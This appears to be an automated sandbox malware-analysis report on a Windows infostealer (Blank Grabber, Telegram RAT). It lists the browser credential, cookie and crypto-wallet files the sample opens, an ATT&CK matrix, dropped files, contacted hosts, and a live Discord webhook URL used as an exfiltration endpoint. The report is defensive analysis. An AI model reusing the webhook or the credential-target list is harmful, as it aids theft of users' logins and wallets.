Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: Yara match	File source: 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: El9HaBFrFM.exe PID: 7532, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000001.00000003.2243032085.0000025069320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1687939163.00000230D3DC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2241739190.000002506917B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1687939163.00000230D3DC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2254069352.0000025069320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: El9HaBFrFM.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: El9HaBFrFM.exe PID: 7532, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI75162\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: El9HaBFrFM.exe PID: 7532, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	41 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	1 Browser Extensions	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	22 Command and Scripting Interpreter	2 Registry Run Keys / Startup Folder	111 Process Injection	21 Obfuscated Files or Information	Security Account Manager	510 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	2 Registry Run Keys / Startup Folder	11 Software Packing	NTDS	161 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	161 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	161 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	111 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
El9HaBFrFM.exe	53%	ReversingLabs	Win64.Trojan.Generic

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI75162\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\python313.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75162\unicodedata.pyd	0%	ReversingLabs

Name	IP	Active	Malicious
jsdelivr.map.fastly.net	151.101.193.229	true	false
um.simpli.fi	35.204.158.49	true	false
discord.com	162.159.128.233	true	true
tagr-pixel-nginx-odr-euw4.mookie1.com	34.160.236.64	true	false
am1-direct-bgp.contextweb.com	208.93.169.131	true	false
dsp.adkernel.com	174.137.133.49	true	false
stats.g.doubleclick.net	64.233.167.156	true	false
code.jquery.com	151.101.66.137	true	true
widget.nl3.vip.prod.criteo.com	178.250.1.9	true	false
cm.g.doubleclick.net	142.250.185.194	true	false
ds-pr-bh.ybp.gysm.yahoodns.net	52.16.92.15	true	false
www.google.com	142.250.185.228	true	false
ip-api.com	208.95.112.1	true	false
sync.srv.stackadapt.com	54.88.211.52	true	false
trksyln.net	160.153.155.187	true	true
match.adsrvr.org	35.71.131.137	true	false
match.prod.bidr.io	54.170.20.205	true	false
sync2-dsp.e-volution.ai	8.2.111.136	true	false
sync.ipredictive.com	107.21.226.44	true	false
ep1.adtrafficquality.google	216.58.206.34	true	false
s.uuidksinc.net	185.98.54.153	true	false
gw-c-eu-isp.temu.com	20.157.217.118	true	false
ep2.adtrafficquality.google	216.58.206.65	true	false
gtrace.mediago.io	35.214.168.80	true	false
analytics-alv.google.com	216.239.34.181	true	false
googleads.g.doubleclick.net	142.250.184.226	true	false
www3.l.google.com	142.250.185.142	true	false
ads.travelaudience.com	35.190.0.66	true	false
onetag-sys.com	51.89.9.252	true	false
td.doubleclick.net	172.217.18.2	true	false
upload.wikimedia.org	185.15.59.240	true	false
widget.us5.vip.prod.criteo.com	74.119.117.16	true	false
ka-f.fontawesome.com	unknown	unknown	false
cdn.jsdelivr.net	unknown	unknown	false
fundingchoicesmessages.google.com	unknown	unknown	false
a.c.appier.net	unknown	unknown	false
www.temu.com	unknown	unknown	false
dis.criteo.com	unknown	unknown	false
a.fsdn.com	unknown	unknown	false
widget.us.criteo.com	unknown	unknown	false
pr-bh.ybp.yahoo.com	unknown	unknown	false
odr.mookie1.com	unknown	unknown	false
kit.fontawesome.com	unknown	unknown	false
px.ads.linkedin.com	unknown	unknown	false
www.trksyln.net	unknown	unknown	false
bh.contextweb.com	unknown	unknown	false
analytics.google.com	unknown	unknown	false
dclk-match.dotomi.com	unknown	unknown	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://trksyln.net/tgmacro/download	false
https://discord.com/api/webhooks/1301205706979938325/6QPgIPYq-Css-OJ6_lkSJ5Pdu0MNeXcvPrjnAZiyfOIJh3PJiYs412SWGodn3lagwGj7	true
https://trksyln.net/favicon.ico	false
https://trksyln.net/resources/css/site.css	false
https://sync.srv.stackadapt.com/sync?nid=154&google_gid=CAESEHWbVka7PFDHpdWk2787PTM&google_cver=1&google_push=AXcoOmRyI8F21-Wg9-ClV_GMcSKS-JEdK8e0hNkNpUxrM_9_KTEJg_mGuqLEG93DCe1MxNcb1YG8zgga00vYgS2qswEdwz2nZ6Ibdw	false
https://fundingchoicesmessages.google.com/f/AGSKWxXE0rdt5cwklf9PRBqqi8rFncdilTmLVYbRCmgcYEIr_h6aXnlDVbYl8-Mw69k26WrMfK2ANMfR9tO7b_s5NhLr9ZNkM_vAqZxxWuutweCz4t4EvQ7RPeu7lVUr28c-H-5-bioZAg==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzcyLDU3NDAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNl0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vdHJrc3lsbi5uZXQvRXJyb3IiLG51bGwsW1s4LCJZc2dPT2N0dWtySSJdLFs5LCJlbi1VUyJdLFsxOSwiMiJdLFsxNywiWzBdIl0sWzE4LCJbW1sxXV1dIl1dXQ	false
https://fundingchoicesmessages.google.com/i/ca-pub-9495854422341365?href=https%3A%2F%2Ftrksyln.net%2FError&ers=2	false
http://www.trksyln.net/tgmacro/download	false
https://sync2-dsp.e-volution.ai/sync?id=10&google_gid=CAESELZvmPR7DxJls1q5vUVneqI&google_cver=1&google_push=AXcoOmTOEF9Y8fogjEB4TqPOvFToDFSNcqrrOe7PA0KGyHSr7lsEvHJLWXoidRqi6SOq-7TG1-HqyFGdK2rWPeFjmNw3z3TgjDyQdg	false
https://odr.mookie1.com/t/v2/sync?tagid=V2_4531&src.visitorid=CAESEF9fyWZJ8RKws_tJ1qGsPfA&google_push=AXcoOmR4H2VfDZB2KNV09WyzX4pnuC39urG3o7HFxj9XXoEoU4DPWDgCGNwoygQN3Mr9g8i_oN8U9qlhz3zZEvnu_wfoP_GQkTanpUQ&google_cver=1	false
https://ep1.adtrafficquality.google/getconfig/sodar?sv=200&tid=gda&tv=r20241028&st=env	false
https://pr-bh.ybp.yahoo.com/sync/adx?google_gid=CAESEEmQdMAM7E0W-DH6rhDiIxs&google_cver=1&google_push=AXcoOmSC5XzHMFryMzDkGxghutUO-mvFIJ78eTpuHDkgVH0JaQqClGaoWQeMEbZOwXl-_6VPMlKnpXxaJBwSkNZeCT74kzVwrTTEcm0	false
https://match.adsrvr.org/track/cmf/google?google_gid=CAESELJu5-7ezmiSZQVy8-_oFDQ&google_cver=1&google_push=AXcoOmRx0KuDS_5o9Zy6vJW0KAWcooCxdmf_izsR3SRJiVhg6QBKvaasyHJxXO09-1UoZ8_V-EKFl_9_C3vcmkaDrVzPGOLrd9VN9N3E	false
https://ep2.adtrafficquality.google/sodar/sodar2.js	false
https://www.temu.com/api/adx/cm/pixel?google_gid=CAESEPW3MUN8tvNLNoJsiPIpkO8&google_cver=1&google_push=AXcoOmRTXTUn1Pr6awWAnQRPgchY6LBTD7UWgfftnoBHloxfG5GmoNInKY9_iM4LiUT3GONf9BhydenY40DkAIQfixnY9Gu6A9hJZS1O	false
https://match.prod.bidr.io/cookie-sync/adx?google_gid=CAESEDiYK4sqMzOUbRWTRd1nDCw&google_cver=1&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zof	false
https://fundingchoicesmessages.google.com/f/AGSKWxUGL8xOsRaRP5PFyweqWIg8FLUl9Kj6bzVgUHc3lpUPZXC03phBxzVHNadhsFw6_SzGM2DcFUpr-aQhK_YmXtMeNnbqjjF6RvqMXAXnOY2uUuOqYG08zgv8dhrK8dARDb02qTW72dksb9BfH6gYBeExaqhirVZfYVfltGg-pJlYyh4-ZwVEQ-1y8o4E/_/googlempu.-scrollads.-banner-ad.=display_ad&_ads_iframe_	false
https://www.temu.com/api/adx/cm/pixel?google_gid=CAESENYT61gwLXGsOhmLZBLf7tE&google_cver=1&google_push=AXcoOmSwaAEJs2KOmCEYVvFDTykRMfzP5EgxESu2Kp_CNP1qYCwsJSzte81WmXDP9HOJ6CmStE9CMEmJ5PqfvDw16JSgB3T_dmeec4Dc4Q	false
https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css	false
https://www.google.com/pagead/drt/ui	false
https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js	false
https://www.google.com/ads/measurement/l?ebcid=ALh7CaQdsNBo9WRTFG5NvmpTSV1NED_cHunzkusyqhhJ8wsHTvFR9ycGSGsL-T38B7ZwdJYBS7dgA391Exs0qr0ZBQUJ4_OAxg	false
https://gtrace.mediago.io/ju/cs/google?google_gid=CAESEI1qM-uapk6ijqCEkmvquJE&google_cver=1&google_push=AXcoOmQzdVcA5PSUWiPvj9qwcPXZXVb8HNbTivNbTzQifDQck24kFKR7TStxtgxFXn-j4k3gshyw_znnZgyV57zTXchMvGa5P0ZnjS-k9g	false
https://fundingchoicesmessages.google.com/i/pub-9495854422341365?ers=1	false
